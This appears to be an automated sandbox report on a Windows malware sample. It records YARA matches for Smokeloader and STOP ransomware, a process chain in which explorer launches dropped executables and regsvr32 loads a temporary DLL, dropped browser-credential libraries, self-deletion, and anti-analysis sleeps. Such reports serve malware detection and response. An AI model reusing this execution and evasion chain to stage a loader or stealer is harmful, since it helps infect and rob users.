Source: 0000000B.00000002.473353545.0000000000871000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.328002456.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000012.00000000.425225650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000000.425225650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000000.425225650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000012.00000000.428495458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000000.428495458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000000.428495458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 253.exe PID: 1692, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 253.exe PID: 4188, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 00430278 appears 112 times
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 00403C38 appears 71 times
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402241 NtQuerySystemInformation, 0_2_00402241
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040224D NtQuerySystemInformation, 0_2_0040224D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402251 NtQuerySystemInformation, 0_2_00402251
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402219 NtQuerySystemInformation, 0_2_00402219
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040221B NtQuerySystemInformation, 0_2_0040221B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401581
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401584
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401587
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040156B
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00402241 NtQuerySystemInformation, 11_2_00402241
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_0040224D NtQuerySystemInformation, 11_2_0040224D
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00402251 NtQuerySystemInformation, 11_2_00402251
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401577
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00402219 NtQuerySystemInformation, 11_2_00402219
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_0040221B NtQuerySystemInformation, 11_2_0040221B
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 11_2_00401727
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401581
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401584
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401587
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_04EA4570 NtCreateThreadEx, 13_2_04EA4570
Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: 253.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: sfrvjvv.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sfrvjvv Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@19/22@2/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00415EAC GetLastError,FormatMessageA, 13_2_00415EAC
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004128C8 FindResourceA,LoadResource,SizeofResource,LockResource, 13_2_004128C8
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\sfrvjvv C:\Users\user\AppData\Roaming\sfrvjvv
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user~1\AppData\Local\Temp\FED8.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user~1\AppData\Local\Temp\FED8.dll
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\253.exe C:\Users\user~1\AppData\Local\Temp\253.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\959.exe C:\Users\user~1\AppData\Local\Temp\959.exe
Source: C:\Users\user\AppData\Local\Temp\959.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\253.exe Process created: C:\Users\user\AppData\Local\Temp\253.exe C:\Users\user~1\AppData\Local\Temp\253.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\959.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user~1\AppData\Local\Temp\FED8.dll Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\253.exe C:\Users\user~1\AppData\Local\Temp\253.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\959.exe C:\Users\user~1\AppData\Local\Temp\959.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user~1\AppData\Local\Temp\FED8.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process created: C:\Users\user\AppData\Local\Temp\253.exe C:\Users\user~1\AppData\Local\Temp\253.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\959.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user~1\AppData\Local\Temp\FED8.tmp Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040765A GetDiskFreeSpaceA, 13_2_0040765A
Source: softokn3.dll.20.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.20.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.20.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.20.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.20.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.20.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.20.dr, nss3.dll.20.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.20.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.20.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.20.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.20.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1156:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\264782971_qJ5tS2bD5fD1nZ5kD2kV
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 253.exe, 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 253.exe, 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: softokn3.pdbp source: softokn3.dll.20.dr
Source: Binary string: C:\rufud-fuza.pdb source: 253.exe, 0000000E.00000000.365710551.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 0000000E.00000002.441234028.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 00000012.00000000.379623038.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: '-&C:\liv98\mid-hiza.pdb source: file.exe
Source: Binary string: C:\liv98\mid-hiza.pdb source: file.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 253.exe, 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 253.exe, 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 253.exe, 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: nss3.dll.20.dr
Source: Binary string: &#R/C:\rufud-fuza.pdb source: 253.exe, 0000000E.00000000.365710551.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 0000000E.00000002.441234028.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 253.exe, 00000012.00000000.379623038.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: softokn3.pdb source: softokn3.dll.20.dr

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sfrvjvv Unpacked PE file: 11.2.sfrvjvv.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E1890 push cs; retf 0_2_005E189C
Source: C:\Users\user\AppData\Roaming\sfrvjvv Code function: 11_2_005A1890 push cs; retf 11_2_005A189C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00436068 push ecx; ret 13_2_0043639E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00428000 push ecx; mov dword ptr [esp], eax 13_2_00428005
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004250D0 push ecx; mov dword ptr [esp], edx 13_2_004250D8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040C094 push 0040C210h; ret 13_2_0040C208
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0042F172 push 0042F1A0h; ret 13_2_0042F198
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0042F174 push 0042F1A0h; ret 13_2_0042F198
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004061E0 push 0040620Ch; ret 13_2_00406204
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0042F1AC push 0042F370h; ret 13_2_0042F368
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F1B4 push 0040F22Ah; ret 13_2_0040F222
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040C212 push 0040C283h; ret 13_2_0040C27B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040C214 push 0040C283h; ret 13_2_0040C27B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F22C push 0040F2D4h; ret 13_2_0040F2CC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F2D6 push 0040F384h; ret 13_2_0040F37C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040C28C push 0040C2C0h; ret 13_2_0040C2B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040C294 push 0040C2C0h; ret 13_2_0040C2B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0042F344 push 0042F370h; ret 13_2_0042F368
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00432348 push 00432402h; ret 13_2_004323FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F358 push 0040F384h; ret 13_2_0040F37C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00413302 push 004133AFh; ret 13_2_004133A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00413304 push 004133AFh; ret 13_2_004133A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004133B4 push 00413444h; ret 13_2_0041343C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F3BB push 0040F409h; ret 13_2_0040F401
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F3BC push 0040F409h; ret 13_2_0040F401
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_00413446 push 004134E4h; ret 13_2_004134DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0043045C push 0043048Fh; ret 13_2_00430487
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F40D push 0040F440h; ret 13_2_0040F438
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_0040F414 push 0040F440h; ret 13_2_0040F438
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004304A4 push 004304D0h; ret 13_2_004304C8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_004134B8 push 004134E4h; ret 13_2_004134DC
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user~1\AppData\Local\Temp\FED8.dll
Source: 959.exe.1.dr Static PE information: section name: /4
Source: 959.exe.1.dr Static PE information: section name: /14
Source: 959.exe.1.dr Static PE information: section name: /29
Source: 959.exe.1.dr Static PE information: section name: /41
Source: 959.exe.1.dr Static PE information: section name: /55
Source: 959.exe.1.dr Static PE information: section name: /67
Source: 959.exe.1.dr Static PE information: section name: /80
Source: 959.exe.1.dr Static PE information: section name: /91
Source: 959.exe.1.dr Static PE information: section name: /102
Source: nss3.dll.20.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.20.dr Static PE information: section name: .didat
Source: mozglue.dll.20.dr Static PE information: section name: .00cfg
Source: freebl3.dll.20.dr Static PE information: section name: .00cfg
Source: softokn3.dll.20.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.20.dr Static PE information: section name: /4
Source: sqlite3.dll.20.dr Static PE information: section name: /19
Source: sqlite3.dll.20.dr Static PE information: section name: /31
Source: sqlite3.dll.20.dr Static PE information: section name: /45
Source: sqlite3.dll.20.dr Static PE information: section name: /57
Source: sqlite3.dll.20.dr Static PE information: section name: /70
Source: sqlite3.dll.20.dr Static PE information: section name: /81
Source: sqlite3.dll.20.dr Static PE information: section name: /92
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sfrvjvv Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\959.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FED8.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\253.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sfrvjvv Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\sfrvjvv:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\253.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\959.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\959.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\959.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfrvjvv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfrvjvv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfrvjvv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfrvjvv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfrvjvv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfrvjvv Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Windows\explorer.exe TID: 1764 Thread sleep count: 644 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5208 Thread sleep count: 352 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5208 Thread sleep time: -35200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5032 Thread sleep count: 314 > 30 Jump to behavior
